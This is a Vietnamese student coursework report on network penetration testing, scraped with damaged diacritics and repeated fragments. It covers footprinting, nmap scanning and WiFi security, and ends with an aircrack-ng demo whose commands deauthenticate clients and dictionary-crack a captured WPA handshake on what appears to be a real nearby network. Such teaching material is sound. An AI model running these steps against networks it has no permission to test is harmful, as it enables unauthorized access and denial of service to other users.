Bài tập lớn kiểm thử xâm nhập mạng

41 64 0
Bài tập lớn kiểm thử xâm nhập mạng

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

BÀI TẬP LỚN KIỂM THỬ XÂM NHẬP MẠNG NHÓM 1 Giảng viên: Nguyễn Ngọc Điệp Hà Nội, 2021 MỤC LỤC LỜI MỞ ĐẦU 5 I. FOOTPRINTING 6 1. Sơ lược về công nghệ 6 2. Phương pháp Footprinting 6 2.1. Footprinting qua các công cụ tìm kiếm 7 2.2. Footprinting sử dụng tính năng tìm kiếm nâng cao của Google 7 2.3. Footprinting qua các mạng xã hội 8 2.4. Footprinting qua các website của đối tượng 8 2.5. Footprinting qua Email 9 2.6. Footprinting bằng WHOIS 9 2.7. Footprinting qua DNS 10 2.8. Footprinting qua mạng máy tính 10 2.9. Footprinting bằng Social Engineering 11 3. Kết quả thu được 11 II. SCANNING 12 1. Sơ lược về công nghệ 12 2. Sử dụng nmap cho mạng cục bộ 13 3. Sử dụng nmap cho các mạng từ xa 14 III. LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY 16 1. Khái niệm không dây 16 1.1. Mạng không dây 16 1.2. Ưu nhược điểm của mạng không dây 16 1.3. Mã hóa mạng không dây 16 1.4. Các thuật ngữ không dây 17 1.5. Công nghệ WiFi 20 2. Mã hóa không dây 24 2.1. Mã hóa WEP 24 2.2. Mã hóa WPA 25 2.3. Mã hóa WPA2 27 3. Mối đe dọa không dây 29 3.1. Các cuộc tấn công kiểm soát truy cập 29 3.2. Các cuộc tấn công về tính toàn vẹn và bảo mật 29 3.3. Các cuộc tấn công sẵn có 29 3.4. Các cuộc tấn công xác thực 29 3.5. Tấn công điểm truy cập giả mạo 29 3.6. Liên kết sai với khách hàng 29 3.7. Tấn công điểm truy cập bị cấu hình sai 29 3.8. Hiệp hội trái phép 29 3.9. Tấn công kết nối Ad Hoc 30 3.10. Jamming Signal Attack 30 3.11. Hạn chế về khả năng quản trị 30 3.12. Khả năng mã hóa dữ liệu 30 3.13. Xác thực quyền người dùng 30 4. Phương pháp hack không dây 31 4.1. Khám phá WiFi 31 4.2. Ánh xạ GPS 31 4.3. Phân tích lưu lượng không dây 31 4.4. Khởi động các cuộc tấn công không dây 31 5. Công cụ bảo mật không dây 32 5.1. Hệ thống ngăn chặn xâm nhập không dây 32 5.2. Công cụ kiểm tra bảo mật WiFi 32 IV. DEMO CRACK PASSWORD WIFI BẰNG AIRCRACKNG 33 1. Bật chế độ Monitor ở card Wifi 33 2. Hack mật khẩu Wifi bằng Aircrackng 34 V. NGUỒN THAM KHẢO 40 MỤC LỤC HÌNH ẢNH Hình 1: Thông tin về Apple 7 Hình 2: Chức năng tìm kiếm nâng cao 7 Hình 3: Thông tin một người trên MXH 8 Hình 4: Thu thập thông tin password trên Shodan.io 8 Hình 5: Thu thập thông tin sử dụng emailTrackerPro 9 Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com 9 Hình 7: Thông tin DNS của apple.com 10 Hình 8: Sử dụng tracert để tìm thông tin con đường đến example.com 10 Hình 9: Sử dụng lệnh “nmap F (địa chỉ IP)” 13 Hình 10: Sử dụng nmap cho các mạng từ xa 14 Hình 11: Sử dụng lệnh “nmap sT (địa chỉ IP mục tiêu)” 15 Hình 12: Sử dụng lệnh “nmap sT (địa chỉ IP mục tiêu) p25150” 15 Hình 13: Sử dụng lệnh “nmap (địa chỉ IP mục tiêu) p80” 15 Hình 14: Mở rộng cho mạng có dây 18 Hình 15: Nhiều điểm truy cập 18 Hình 16: Điểm phát sóng 3G4G 19 Hình 17: Các tiêu chuẩn không dây 19 Hình 18: Mở xác thực 20 Hình 19: Xác thực khóa chia sẻ 21 Hình 20: Luồng xác thực 802.1x –EAP không dây 22 Hình 21: Các biểu tượng WiFi 23 Hình 22: Hoạt động của mã hóa WEP 24 Hình 23: Hoạt động của mã hóa WPA 26 Hình 24: So sánh các giao thức mã hóa 802.11 27 Hình 25: Quá trình bắt tay 4 bước 27 Hình 26: Mô hình các cuộc tấn công không dây 31 Hình 27: Bật chế độ Monitor ở card Wifi 33 Hình 28: Kết quả 34 Hình 29: Kiểm tra và loại bỏ xung đột 34 Hình 30: Kiểm tra giao diện mạng không dây đang dùng 35 Hình 31: Mạng không dây hiện tại là wlan0 35 Hình 32: Phát hiện các mạng không dây 36 Hình 33: sudo airodumpng w hack1 c 11 bssid 0C:4B:54:9F:74:9E wlan0 36 Hình 34: BSSID, ESSID và các tín hiệu đang được truyền đi 37 Hình 35: Ngắt kết nối các thiết bị đang kết nối mạng không dây 38 Hình 36: Tệp hack 38 Hình 37: sudo aircrackng hack102.cap w homenguyenhoangducb17dcat015password.txt 39 Hình 38: Dò thành công mật khẩu 39 LỜI MỞ ĐẦU Mạng không dây là công nghệ phổ biến và thông dụng nhất trong xã hội hiện nay, mạng có dây đã và đang dần bị thay thế bởi mạng không dây vì tính dễ dàng và di động của nó. Sử dụng mạng không dây không chỉ tăng tính di dộng trong mạng mà còn tăng tính linh hoạt cho người dùng. Trong thời kỳ đầu của công nghệ không dây, mạng không dây được cho là không đủ an toàn để bào vệ thông tin. Tuy nhiên, nhiều kỹ thuật mã hóa đã được sử dụng để bảo mật các kênh thông tin liên lạc không dây.

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THÔNG TIN I -🙞🙞🙞🙞🙞 - BÀI TẬP LỚN KIỂM THỬ XÂM NHẬP MẠNG - NHÓM 1 Hà Nội, 2021 MỤC LỤC MỤC LỤC HÌNH ẢNH LỜI MỞ ĐẦU Mạng không dây công nghệ phổ biến thông dụng xã hội nay, mạng có dây dần bị thay mạng khơng dây tính dễ dàng di động Sử dụng mạng khơng dây khơng tăng tính di dộng mạng mà cịn tăng tính linh hoạt cho người dùng Trong thời kỳ đầu công nghệ không dây, mạng không dây cho khơng đủ an tồn để bào vệ thơng tin Tuy nhiên, nhiều kỹ thuật mã hóa sử dụng để bảo mật kênh thông tin liên lạc không dây I FOOTPRINTING Sơ lược công nghệ Footprinting việc thu thập thơng tin có liên quan đến mạng mục tiêu mạng đích Việc thu thập thông tin giúp xác định cách khác để xâm nhập vào mạng mục tiêu Những thơng tin thu thập từ thông tin cá nhân công khai thông tin nhạy cảm từ nguồn bí mật Thông thường, thu thập thông tin thám thực công Social Engineering, công hệ thống mạng, kỹ thuật khác Phương pháp Footprinting - Footprinting qua công cụ tìm kiếm - Footprinting sử dụng tính tìm kiếm nâng cao Google - Footprinting qua mạng xã hội - Footprinting qua website đối tượng - Footprinting qua Email - Footprinting WHOIS - Footprinting qua DNS - Footprinting qua mạng máy tính - Footprinting Social Engineering 2.1 Footprinting qua công cụ tìm kiếm Thao tác hiệu thu thập thông tin thông qua công cụ tìm kiếm Cơng cụ tìm kiếm trích xuất thơng tin chủ thể bạn tìm kiếm internet Bạn sử dụng cơng cụ tìm kiếm trình duyệt Google Bing, tìm kiếm tổ chức Kết thu thập thơng tin có sẵn Internet Hình 1: Thơng tin Apple 2.2 Footprinting sử dụng tính tìm kiếm nâng cao Google Một số tùy chọn nâng cao sử dụng để tìm kiếm chủ đề cụ thể cơng cụ tìm kiếm Các cơng cụ tìm kiếm nâng cao làm cho việc tìm kiếm trở nên thích hợp tập trung vào chủ đề định Hình 2: Chức tìm kiếm nâng cao 2.3 Footprinting qua mạng xã hội Hình 3: Thơng tin người MXH 2.4 Footprinting qua website đối tượng Các thơng tin thu thập dịch vụ trực tuyến xác định trước netcraft.com cách sử dụng phần mềm Burp Suite, Zaproxy, Website Informer, Firebug,… Những cơng cụ mang lại thông tin loại kết nối, trạng thái thông tin sửa đổi cuối Bằng cách lấy loại thơng tin này, kẻ cơng kiểm tra mã nguồn, thông tin chi tiết nhà phát triển, cấu trúc hệ thống tệp tập lệnh Hình 4: Thu thập thơng tin password Shodan.io 2.5 Footprinting qua Email Email đóng vai trị quan trọng việc điều hành hoạt động kinh doanh tổ chức Email cách giao tiếp chuyên nghiệp phổ biến nhất, sử dụng rộng rãi người sử dụng quan Giao tiếp với đối tác, nhân viên, đối thủ cạnh tranh, nhà thầu khác có liên quan đến việc điều hành tổ chức Nội dung nội dung Do đó, email quan trọng, có giá trị kẻ cơng Hình 5: Thu thập thơng tin sử dụng emailTrackerPro 2.6 Footprinting WHOIS WHOIS giúp thu thập thông tin liên quan đến tên miền, thông tin quyền sở hữu, địa IP, liệu Netblock thơng tin khác Tra cứu WHOIS giúp tìm sở đứng sau tên miền mục tiêu Hình 6: Sử dụng Whois để thu thập thông tin trang web Apple.com 2.7 Footprinting qua DNS Thông tin tra cứu DNS hữu ích để xác định máy chủ lưu trữ mạng nhắm đến Có số cơng cụ có sẵn internet thực tra cứu DNS Hình 7: Thơng tin DNS apple.com 2.8 Footprinting qua mạng máy tính Một cách thu thập thơng tin quan trọng thơng qua mạng máy tính Có số cơng cụ có sẵn sử dụng để in thơng tin mạng máy tính nhằm thu thập thơng tin mạng mục tiêu Hình 8: Sử dụng tracert để tìm thơng tin đường đến example.com 2.9 Footprinting Social Engineering Việc thu thập thơng tin Social Engineering hữu ích Nó giúp thu thập thơng tin cá nhân, thơng tin đăng nhập hay nhạy cảm thông qua Social Engineering đơn giản Một số kỹ thuật Social Engineering là: - Eavesdropping - Phishing - Shoulder Surfing - Dumpster Diving Kết thu Sau Footprinting ta thu kết quả: - Thông tin website doanh nghiệp, tổ chức - Thông tin website như: IP, dải IP,… - Thông tin vị trí địa lý, cấu trúc thư mục website - Thông tin mạng, DNS,… II SCANNING Sơ lược cơng nghệ Sau giai đoạn Footprinting, ta có đủ thơng tin mục tiêu Scanning u cầu số thông tin để tiến hành thêm Scanning phương pháp lấy thông tin mạng xác định máy chủ, cổng thông tin dịch vụ cách quét mạng cổng Mục tiêu Scanning là: - Xác định máy chủ trực tiếp mạng - Xác định cổng mở đóng - Xác định thông tin hệ điều hành - Xác định dịch vụ chạy mạng - Xác định quy trình chạy mạng - Xác định diện thiết bị bảo mật - Xác định kiến trúc hệ thống - Xác định dịch vụ chạy - Xác định lỗ hổng 10 2.3.2 Quá trình bắt tay bước (4-Way Handshake) Trong giao thức WPA/WPA2, kết nối người dùng (Client/Supplicant) với thiết bị phát Wifi (AP/Authenticator) khởi tạo trình bắt tay bước (4-way Handshake) Hình 25: Q trình bắt tay bước Q trình hiểu đơn giản sau: Ban đầu thiết bị phát wifi (AP) thiết bị cần gia nhập (Client) cài đặt sẵn mật bảo vệ mạng Wifi, Pre-Shared Key 256 bit (PSK), hay gọi Pre-Shared Master Key (PMK) PMK lưu trữ AP Client, hồn tồn khơng bị truyền trình xác thực truy cập mạng, khởi tạo kết nối Quá trình 4-way Handshake bắt đầu sau Client gửi yêu cầu gia nhập mạng tới AP • • Bước 1: thiết bị AP sinh chuỗi số ngẫu nhiên gọi ANonce gửi tới cho Client Bước 2: Client tự sinh chuỗi số ngẫu nhiên, gọi SNonce Lúc này, phía Client sinh Pairwise Temporal Key (PTK) dựa PMK, ANonce, SNonce, địa MAC Client (AA), địa MAC AP (SA) PTK = function(PMK, ANonce, SNonce, AA, SA) Lúc này, Client gửi cho AP tin chứa giá trị SNonce dạng plain text Đồng thời, Client sử dụng PTK vừa sinh để tính mã băm từ SNonce gọi Message Integrity Code (MIC) gửi kèm tin gửi cho AP • • Bước 3: AP nhận SNonce Client AP sử dụng thuật tốn giống phía Client để tính giá trị PTK Nếu phía Client AP có PMK giá trị PTK tính giống Lúc này, AP sử dụng PTK vừa tính để tính giá trị MIC từ SNonce, so sánh giá trị với MIC nhận từ Client Nếu MIC khớp nhau, chứng tỏ Client AP có PMK, tức Client phép truy cập vào mạng Wifi Lúc AP gửi cho Client tin cài đặt để Client sử dụng PTK làm khoá mã cho phiên truyền Bước 4: Client cài đặt khoá mã gửi tin xác nhận lại cho AP Quá trình 4-way Handshake kết thúc Từ tin mà Client AP trao đổi với mã 27 hoá với khoá mã vừa cài đặt, khố mã có giá trị phiên truyền tính tốn để không bị sử dụng lại Quá trình xác thực giao thức chặt chẽ, thơng tin PMK hồn tồn giữ bí mật, khơng truyền trình xác thực Vì hacker khó giải mã PMK dựa vào thông tin truyền Và hầu hết kĩ thuật công Wifi tập trung vào việc bắt lấy gói tin q trình 4-way Handshake để biết tham số SNonce, ANonce, AA, SA, sau thực dị giá trị PMK kết phù hợp Việc dị tìm hiệu mật Wifi đơn giản, với trường hợp mật Wifi phức tạp việc dị tìm gần khơng thể Mối đe dọa không dây 3.1 Các công kiểm sốt truy cập Tấn cơng kiểm sốt truy cập không dây công kẻ công xâm nhập mạng cách trốn tránh tham số kiểm soát truy cập, chẳng hạn cách giả mạo địa MAC, Rouge Điểm truy cập cấu hình sai, v.v 3.2 Các cơng tính tồn vẹn bảo mật Các cơng tồn vẹn bao gồm tiêm WEP Chèn khung liệu, công phát lại bit lật, v.v Các cơng bảo mật bao gồm phân tích lưu lượng, chiếm quyền điều khiển phiên, giả mạo, bẻ khóa, cơng MITM, v.v để đánh chặn thông tin mật thông tin 3.3 Các cơng sẵn có Các công sẵn sàng bao gồm công Lụt Từ chối dịch vụ để ngăn chặn người dùng hợp pháp kết nối truy cập mạng không dây Các cơng sẵn sàng thực cách xác thực tràn ngập, nhiễm độc ARP, công chống xác thực, công giải thể, v.v 3.4 Các công xác thực Tấn công xác thực nhằm mục đích đánh cắp thơng tin nhận dạng mạng không dây hợp pháp khách hàng để có quyền truy cập vào mạng cách mạo danh Nó bao gồm Mật kỹ thuật bẻ khóa, đánh cắp danh tính, đốn mật 3.5 Tấn công điểm truy cập giả mạo Tấn công điểm truy cập giả mạo kỹ thuật điểm truy cập giả mạo nơi có mạng khơng dây hợp pháp thường có SSID Người dùng giả định kẻ lừa đảo điểm truy cập làm điểm truy cập hợp pháp kết nối với Sau người dùng kết nối với điểm truy cập giả mạo, tất lưu lượng truy cập trực tiếp qua kẻ cơng đánh thấy gói để giám sát hoạt động 28 3.6 Liên kết sai với khách hàng Liên kết sai máy khách bao gồm điểm truy cập giả mạo bên thông số công ty mạng lưới Khi nhân viên kết nối với cách bỏ qua sách bảo mật, tất lưu lượng truy cập qua kẻ công 3.7 Tấn cơng điểm truy cập bị cấu hình sai Cuộc cơng điểm truy cập bị định cấu hình sai bao gồm quyền truy cập vào điểm truy cập hợp pháp cách lấy lợi cấu hình sai Cấu hình sai giống mật yếu, mặc định cấu hình mật khẩu, Mạng khơng dây khơng có mật bảo vệ, v.v 3.8 Hiệp hội trái phép Liên kết trái phép kỹ thuật khác mà người dùng bị nhiễm Trojan hoạt động điểm truy cập cho phép kẻ cơng kết nối mạng cơng ty qua Trojan kích hoạt điểm truy cập mềm thơng qua kịch độc hại cho phép thiết bị máy tính xách tay biến thẻ WLAN chúng để truyền Mạng WLAN 3.9 Tấn công kết nối Ad Hoc Ad Hoc mạng khơng an tồn chúng khơng cung cấp xác thực mã hóa Kẻ cơng cố gắng xâm phạm khách hàng quảng cáo chế độ hoc Gây nhiễu tín hiệu cơng Các cơng gây nhiễu tín hiệu u cầu tín hiệu tần số khuếch đại cao gây từ chối cơng dịch vụ Thuật tốn Đa truy cập / Tránh va chạm Carrier Sense yêu cầu thời gian chờ để truyền sau phát va chạm 3.10 Jamming Signal Attack Các công gây nhiễu tín hiệu yêu cầu tín hiệu tần số khuếch đại cao gây công Từ chối dịch vụ Thuật toán Đa truy cập / Tránh va chạm Carrier Sense yêu cầu thời gian chờ để truyền sau phát va chạm 3.11 Hạn chế khả quản trị mạng không dây kết nối với thiết bị sử dụng không dây, thiết bị điển tử đào nằm vùng phủ sowngs mạng khơng dây kết nối với mạng Chính đối tượng xấu dễ dàng xâm nhập vào mạng không dây để công người dùng 3.12 Khả mã hóa liệu - - Mặc dù thông tin truyền mạng mã hóa nhằm ngăn chặn việc truy cập bất hợp pháp, hacker sử dụng thiết bị wifi thay đổi để chặn liệu giải mã chúng, tìm kiếm khóa Sau truy cập trái phép vào mạng gây nên nhiều rắc rối cho hệ thống Chỉ cần máy tính có card mạng wifi bạn lướt web xâm nhập bất hợp pháp mạng máy tính gia nhập mạng 3.13 Xác thực quyền người dùng - lỗ hổng trình xác thực người dùng giúp cho kẻ cơng cơng vào mạng khơng dây Trong q trình xác thực người dùng, người dùng cần phải gửi gói tin AP, sau AP gửi tin phản hồi lại cho người dùng 29 Phương pháp hack không dây 4.1 Khám phá Wi-Fi Bước việc hack mạng khơng dây để thỏa hiệp tìm kiếm thơng tin Thơng tin thu thập cách tạo dấu chân chủ động, thụ động sử dụng công cụ khác Dấu chân thụ động bao gồm đánh gói tin, sử dụng công cụ "Airwaves", "NetSurveyor" công cụ khác để tiết lộ thông tin mạng không dây trực tiếp xung quanh Dấu chân chủ động bao gồm thăm dị điểm truy cập để có thông tin Trong dấu chân chủ động, kẻ cơng gửi u cầu thăm dị điểm truy cập gửi phản hồi thăm dò 4.2 Ánh xạ GPS Ánh xạ GPS trình tạo danh sách mạng Wi-Fi phát để tạo ghi sử dụng GPS GPS theo dõi vị trí Wi-Fi phát Thơng tin sử dụng để bán cho kẻ công hack cộng đồng 4.3 Phân tích lưu lượng khơng dây Phân tích lưu lượng truy cập mạng không dây bao gồm bắt gói tin để tiết lộ thơng tin SSID phát sóng, phương pháp xác thực, kỹ thuật mã hóa, v.v Có số cơng cụ có sẵn để nắm bắt phân tích mạng khơng dây Wireshark, Omni peek, Commview, v.v 4.4 Khởi động công không dây Kẻ công sử dụng công cụ Aircrack-ng công khác ARP poisoning, MITM, Phân mảnh, Giả mạo MAC, Hủy xác thực, Phân tách giả mạo điểm truy cập để bắt đầu cơng vào mạng khơng dây 30 Hình 26: Mơ hình cơng khơng dây Cơng cụ bảo mật không dây 5.1 Hệ thống ngăn chặn xâm nhập không dây Hệ thống ngăn chặn xâm nhập không dây (WIPS) thiết bị mạng cho mạng khơng dây Nó giám sát mạng khơng dây bảo vệ khỏi điểm truy cập trái phép thực phòng chống xâm nhập tự động Bằng cách giám sát phổ vơ tuyến, ngăn chặn điểm truy cập lừa đảo cảnh báo cho quản trị viên mạng phát Cách tiếp cận vân tay giúp tránh thiết bị có địa MAC giả mạo WIPS bao gồm ba thành phần: Máy chủ, Cảm biến Bảng điều khiển Điểm truy cập giả mạo cấu hình sai APs, cấu hình sai máy khách, MITM, mạng đặc biệt, giả mạo MAC, Honeypots, công DOS, v.v giảm thiểu cách sử dụng WIPS 5.2 Công cụ kiểm tra bảo mật Wi-Fi Sử dụng công cụ bảo mật không dây cách tiếp cận khác để bảo vệ mạng không dây Những phần mềm bảo mật cung cấp kiểm tra mạng khơng dây, khắc phục cố, phát hiện, phịng chống xâm nhập, giảm thiểu mối đe dọa, phát lừa đảo, bảo vệ mối đe dọa hàng ngày, điều tra pháp y báo cáo tuân thủ Một số công cụ bảo mật Wi-Fi phổ biến sau: • • • • AirMagnet WiFi Analyzer Motorola’s AirDefense Services Platform (ADSP) Cisco Adaptive Wireless IPS Aruba RFProtect 31 IV DEMO CRACK PASSWORD WIFI BẰNG AIRCRACK-NG Bật chế độ Monitor card Wifi sudo airmon-ng check kill (để kiểm tra xung đột loại bỏ chúng) sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ifconfig wlan0 up [Thử nghiệm] sudo aireplay-ng -9 wlan0 Đã bắt sóng wifi lân cận 32 Hình 27: Bật chế độ Monitor card Wifi 33 Kết quả: Bật chế độ monitor thành cơng Hình 28: Kết Hack mật Wifi Aircrack-ng Đầu tiên ta sử dụng lệnh (sudo airmon-ng check kill) để kiểm tra xung đột loại bỏ chúng Hình 29: Kiểm tra loại bỏ xung đột 34 Sử dụng câu lệnh (sudo airmon-ng start wlan0) để thấy giao diện mạng không dây dùng Chúng ta thấy chế độ monitor (giám sát) bật Hình 30: Kiểm tra giao diện mạng khơng dây dùng Chúng ta chắn giao diện mạng không dây wlan0 câu lệnh (sudo airmon-ng) Hình 31: Mạng khơng dây wlan0 35 Tiếp đến sử dụng câu lệnh (sudo airodump-ng wlan0) để phát mạng khơng dây Như hình ta thấy loạt mạng khơng dây phát Ở loại mạng ta chọn mạng 708,709,710_T2Royalmini Chú ý kênh mà mạng chọn cụ thể kênh 11 Hình 32: Phát mạng không dây Sử dụng câu lệnh (sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0) 36 Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0 Trong -c 11 kênh chọn, 0C:4B:54:9F:74:9E địa MAC, hack1 thư mục tạo để lấy gói tin bắt được, với câu lệnh ta thấy BSSID ESSID tín hiệu truyền Hình 34: BSSID, ESSID tín hiệu truyền 37 Ta thấy có thiết bị kết nối với mạng khơng dây, ta ngắt kết nối thiết bị câu lệnh sau (sudo aireplay-ng deauth -a 0C:4B:54:9F:74:9E wlan0) Trong câu lệnh –deauth hủy xác thực người sử dụng tới mạng wifi liên tục dừng lại câu lệnh Khi người dùng kết nối lại với mạng wifi lúc bắt gói tin chứa mật wifi 38 Hình 35: Ngắt kết nối thiết bị kết nối mạng không dây Ta nhập (ls) ta nhận tệp hack hình Hình 36: Tệp hack Sử dụng câu lệnh: (sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangducb17dcat015/password.txt) Trong nguyenhoangduc-b17dcat015/password.txt địa thư viện mật 39 Hình 37: sudo aircrack-ng hack1-02.cap -w /home/nguyenhoangduc-b17dcat015/password.txt Kết cuối dị mật có thư viện mật Hình 38: Dị thành cơng mật V NGUỒN THAM KHẢO 40 https://www.howkteam.vn/course/13-gioi-thieu-ve-ethical-hacking khai-niem-hack-phan-loaiva-cac-giai-doan/24-dau-vet tham-do cach-tham-do-dau-vet-phan-3-2771 https://www.thekalitools.com/2016/06/su-dung-theharvester-tim-kiem-thong-tin.html https://www.cyberpratibha.com/blog/using-whois-a-command-for-information-gathering/ https://chousensha.github.io/blog/2017/06/27/dnsmap-kali-linux-tools/ https://www.youtube.com/watch?v=WfYxrLaqlN8&t=487s 41 ... nmap –sT 19 2 .16 8 .1. 7 –p25 -15 0 Hình 12 : Sử dụng lệnh “nmap -sT (địa IP mục tiêu) -p25 -15 0” Quét mạng con: Nmap 19 2 .16 7 .1. 7/24 –p80 Hình 13 : Sử dụng lệnh “nmap (địa IP mục tiêu) -p80” 13 III LẤY... airodump-ng wlan0) để phát mạng không dây Như hình ta thấy loạt mạng khơng dây phát Ở loại mạng ta chọn mạng 708,709, 710 _T2Royalmini Chú ý kênh mà mạng chọn cụ thể kênh 11 Hình 32: Phát mạng không dây Sử... airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0) 36 Hình 33: sudo airodump-ng -w hack1 -c 11 -bssid 0C:4B:54:9F:74:9E wlan0 Trong -c 11 kênh chọn, 0C:4B:54:9F:74:9E địa MAC, hack1 thư mục tạo

Ngày đăng: 31/08/2021, 16:08

Từ khóa liên quan

Mục lục

  • LỜI MỞ ĐẦU

  • I. FOOTPRINTING

    • 1. Sơ lược về công nghệ

    • 2. Phương pháp Footprinting

      • 2.1. Footprinting qua các công cụ tìm kiếm

      • 2.2. Footprinting sử dụng tính năng tìm kiếm nâng cao của Google

      • 2.3. Footprinting qua các mạng xã hội

      • 2.4. Footprinting qua các website của đối tượng

      • 2.5. Footprinting qua Email

      • 2.6. Footprinting bằng WHOIS

      • 2.7. Footprinting qua DNS

      • 2.8. Footprinting qua mạng máy tính

      • 2.9. Footprinting bằng Social Engineering

      • 3. Kết quả thu được

      • II. SCANNING

        • 1. Sơ lược về công nghệ

        • 2. Sử dụng nmap cho mạng cục bộ

        • 3. Sử dụng nmap cho các mạng từ xa

        • III. LẤY CẮP DỮ LIỆU MẠNG KHÔNG DÂY

          • 1. Khái niệm không dây

            • 1.1. Mạng không dây

            • 1.2. Ưu nhược điểm của mạng không dây

            • 1.3. Mã hóa mạng không dây

            • 1.4. Các thuật ngữ không dây

              • 1.4.1. GMS

              • 1.4.2. Điểm truy cập

Tài liệu cùng người dùng

Tài liệu liên quan